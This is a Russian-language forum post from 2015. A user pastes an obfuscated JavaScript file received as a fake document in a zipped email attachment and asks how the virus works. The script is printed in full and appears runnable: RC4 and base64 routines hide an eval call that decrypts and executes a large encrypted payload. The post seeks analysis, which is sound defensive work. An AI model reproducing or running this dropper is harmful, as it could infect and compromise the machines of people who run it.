Уважаемые специалисты в области программирования JS, ниже привожу скрипт, который пришел сегодня на почту под видом документа , вложенного в зип архив. Скрипт на компьютере не запускался, просто просматривался текстовым редактором.
Вопрос тем, кто разбирается - как работает этот вирус и что он делает?
Код ниже. ВНИМАНИЕ!!! НЕ СПЕЦИАЛИСТАМ НА КОМПЬЮТЕРЕ НЕ ЗАПУСКАТЬ!!!
function rc4(key, str) {
var s = [], j = 0, x, res = '';
for (var i = 0; i < 256; i++) {
s[i] = i;
}
if (key == 'tt'){
return 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
}
if (key == 'ttt'){
return 'abcdefghijklmnopqrstuvwxyz0123456789';
}
i = 0;
j = 0;
for (var y = 0; y < str.length; y++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
}
return res;
}
function femu( ywobozyfot ) {
var fn = rc4('tt','test');
fn = fn + rc4('ttt','gasdgas');
var tedi = fn+'+'+'/'+'=';
var mof, uvu, uvy, ary, awa, yhi, obi, ilojereh, u=0, uke='';
do {
ary = tedi.indexOf(ywobozyfot.charAt(u++));
awa = tedi.indexOf(ywobozyfot.charAt(u++));
yhi = tedi.indexOf(ywobozyfot.charAt(u++));
this['eval']('obi = tedi.indexOf(ywobozyfot.charAt(u++));');
this['eval']('ilojereh = ary<<18 | awa<<12 | yhi<<6 | obi;');
mof = ilojereh>>16 & 0xff;
uvu = ilojereh>>8 & 0xff;
uvy = ilojereh & 0xff;
if (yhi == 64) uke += String.fromCharCode(mof);
else if (obi == 64) uke += String.fromCharCode(mof, uvu);
else uke += String.fromCharCode(mof, uvu, uvy);
} while (u < ywobozyfot.length);
return uke;
}function u12gikyzazebu(){ return femu('dg==');};function u0gikyzazebu(){ return femu('Zg==');};function u24gikyzazebu(){ return femu('ag==');};function u5gikyzazebu(){ return femu('Zw==');};function u14gikyzazebu(){ return femu('bA==');};function u17gikyzazebu(){ return femu('ZA==');};function u15gikyzazebu(){ return femu('YQ==');};function u10gikyzazebu(){ return femu('ZA==');};function u23gikyzazebu(){ return femu('Zw==');};function u2gikyzazebu(){ return femu('bA==');};function u16gikyzazebu(){ return femu('bA==');};function u29gikyzazebu(){ return femu('YQ==');};function u9gikyzazebu(){ return femu('cw==');};function u19gikyzazebu(){ return femu('ag==');};function u28gikyzazebu(){ return femu('ag==');};function u4gikyzazebu(){ return femu('ag==');};function u21gikyzazebu(){ return femu('bA==');};function u13gikyzazebu(){ return femu('YQ==');};function u18gikyzazebu(){ return femu('Zw==');};function u27gikyzazebu(){ return femu('Zw==');};function u8gikyzazebu(){ return femu('ag==');};function u6gikyzazebu(){ return femu('bA==');};function u3gikyzazebu(){ return femu('cw==');};function u20gikyzazebu(){ return femu('YQ==');};function u25gikyzazebu(){ return femu('YQ==');};function u22gikyzazebu(){ return femu('ZA==');};function u1gikyzazebu(){ return femu('YQ==');};function u7gikyzazebu(){ return femu('YQ==');};function u11gikyzazebu(){ return femu('ZQ==');};function u26gikyzazebu(){ return femu('bA==');};var ds=''; var dss=''; var ena=''; for (var rydo=0; rydo<=29; rydo++) { ena += this['u'+rydo+'gikyzazebu'](); } ds = ena.replace('falsjglajsd',''); dss = ds.replace('aldgjaldgjalgja',''); ena=''; ena=dss;var puquv; puquv=femu('860pztNmsGSSQhaf3mKP3RGuD9BYmETSRG/8LG1eJzvE/YzCweVTytzxdHpGxZYNlz0EoEZjF55T+6ZttJmlZOTGMrzq3MWDHhVdhnDdSM5ngvwvu1Pxf1CiGmSnLMTzqWyCdPqn5aC99kaV0NgIJmu1VkfrXLI7buwZ4AJV1ETHRF59Snx3IjXw77v76rXXtLqPidlVmGJZDXt/TQjdFG1jwk65nnchIJWLCSBLWDaydiTXjbn4t5g6R43OL9DJz1DoNDAXK0TtbmO4AqHjUqrD/S0Ris91XpKxvofnTjxAFSGSVIi9HxQ+DYp7YL+orchAxZ2FfUKvny6/TCSaSC47jiKjF5FG55CEj6ElEJz2kN7qsuak/0mEjaBM1b2J1XqsKHC17nnmAZ5Wv3Kdyyd/mgfO8wjmywuR4qtbStNdV1xdicIesoeUnsomoidueG1jEeC0aQ8CjKoZm9O5JadWi+SVDxPM4EvOPJwi+P1MD3ULRy76wDY4yBQLHdKh8uSdHLn8e3SWtS+dfOo4JHJL6KaZbG/Ya1ftRf/yWXzPHyMHpQBpTQvibtu3zdUcevn31+WsrxLc3r6YDzi54p/L4vK5qez+E2Dnx4AWnKIqGZnkXuCVSgPB3KkQCtgqnxuwu02GCa8P7SNAhqE2cPYEs4yGuyOdDvreS1lfdFKiiqI1CIClEDBg9yFT1YFIlD5WSLPLXDsJMA+ffFM9IHedEPqmmbGL+VTh9a2H8+5IYfnuDjh+EAlwEtkW3onhF6qOp1IzzOAwOk74slZlhQRhf7ycrPyZoU9dPrY9tvNYL5dcbyOyVxhl24rfcVuU2lBlAx5UALct3b+gu7gk3SQS4o/kp78nOTbGuppOrmYyQSgcULQGtOIFTWc71E+sk8RR/zlfmDbE8qg7iuz638uJG7kmcnTjHqx0YyV1XPHU/UmjcZXBzO3i4Azzq9ZnEUUIDv2Jm76KLG7NHRhThqR+oVI='); this[ena](rc4('fdasgasg',puquv));
Сообщение отредактировал FlipGolf: 05.08.2015, 15:22:16